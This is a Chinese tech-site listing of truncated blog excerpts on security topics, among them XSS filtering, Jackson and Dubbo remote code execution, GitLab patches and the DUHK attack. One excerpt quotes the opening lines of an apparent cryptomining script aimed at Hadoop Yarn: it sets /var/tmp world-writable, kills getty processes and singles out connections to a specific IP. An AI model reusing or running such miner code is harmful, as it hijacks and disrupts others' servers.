Stella981 Stella981
3年前
Spring Boot XSS 攻击过滤插件使用
XSS是什么XSS(CrossSiteScripting)攻击全称跨站脚本攻击,为了不与CSS(CascadingStyleSheets)名词混淆,故将跨站脚本攻击简称为XSS,XSS是一种常见web安全漏洞,它允许恶意代码植入到提供给其它用户使用的页面中。xss攻击流程!(https:
Stella981 Stella981
3年前
Sophos UTM 固件反编译 Perl 源码
作者:极光无限维阵漏洞团队负责人—仙果原文链接:https://mp.weixin.qq.com/s/4TXJrYWnSVeGaM6p0K8QA(https://www.oschina.net/action/GoToLink?urlhttps%3A%2F%2Fmp.weixin.qq.com%2Fs%2F4TXJrYWnSVeGaM
Stella981 Stella981
3年前
Gitlab 的安全漏洞是不是太多了点?
Gitlab又又又发布了重要的安全更新补丁12.4.1,12.3.6,和12.2.9,包括社区版和企业版。包含重要的安全更新,官方再次强烈建议所有Gitlab用户立即更新!!!看看从今年7月份到现在,Gitlab发布了多少安全补丁更新,每一次官方都是强烈建议立即更新!!(https://oscimg.oschina.net/
Wesley13 Wesley13
3年前
Jackson 反序列化远程代码执行漏洞复现
本文作者:light(Ms08067实验室SRSPTEAM小组成员)!(https://oscimg.oschina.net/oscnet/fc8ed3d4ebfa70658b548bc1de2e976963e.png)jackson介绍Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON
Stella981 Stella981
3年前
Hadoop Yarn REST API未授权漏洞利用挖矿脚本
!/bin/bashmkdir/var/tmpchmod777/var/tmppkillfgettynetstatantp|grep'27.155.87.59'|grep'ESTABLISHED'|awk'{print$7}'|sede"s/\/.//g"|
Stella981 Stella981
3年前
Apache发布更新Commons
很遗憾地告诉大家,本次更新实际上并没有真实地修复该反序列化安全漏洞,仅是增加了安全检查:仅要求配置系统属性,属性名称为“org.apache.commons.collections.enableUnsafeSerialization”,属性值为“true”,否则会抛出UnsupportedOperationException异常。分析过程:
Stella981 Stella981
3年前
Apache Dubbo 被曝出“高危”远程代码执行漏洞
云栖号资讯:【点击查看更多行业资讯(https://www.oschina.net/action/GoToLink?urlhttps%3A%2F%2Fyqh.aliyun.com%2F%3Fcate%3D%25E8%25B5%2584%25E8%25AE%25AF)】在这里您可以找到不同行业的第一手的上云资讯,还在等什么,快来!!
Easter79 Easter79
3年前
Tails 3.15 发布
!Tails3.15发布Tails3.15发布(https://www.linuxprobe.com/wpcontent/uploads/2019/07/20190712002.png)Tails3.15附带了更新的Tor浏览器和Thunderbird,它还修复了几个错误:Tails3.15已经发布。此版本修复了许多安全漏洞。您应该
Wesley13 Wesley13
3年前
DUHK漏洞提供了快速启动加密攻击的方法
根据新的安全研究,使用具有硬编码密钥的随机数生成器可能会发起加密攻击,通过内部网,虚拟专用网(VPN)等传播私有数据。一个白皮书研究人员在约翰·霍普金斯大学和宾夕法尼亚大学是第一个提请注意密码的攻击方法,它一直被冠以不要使用硬编码的钥匙(DUHK)。通过逆向工程在Fortinet设备上运行的一组固件,研究人员能够在不到五分钟的时间内破译加密参数。!
Wesley13 Wesley13
3年前
MySQL ProxySql 由于漏洞扫描导致的 PROXYSQL CPU 超高
!(https://oscimg.oschina.net/oscnet/263ba261140b4e2d8b1e1aa3d6f19f32.png)ProxySQL本身是一款非常棒的MYSQL中间件的开源产品,在公司运行了一段时间后,突然一天报警,所在机器的CPU出奇的高,之前在测试系统,预生产,以及生产系统均没有出现问题.开始未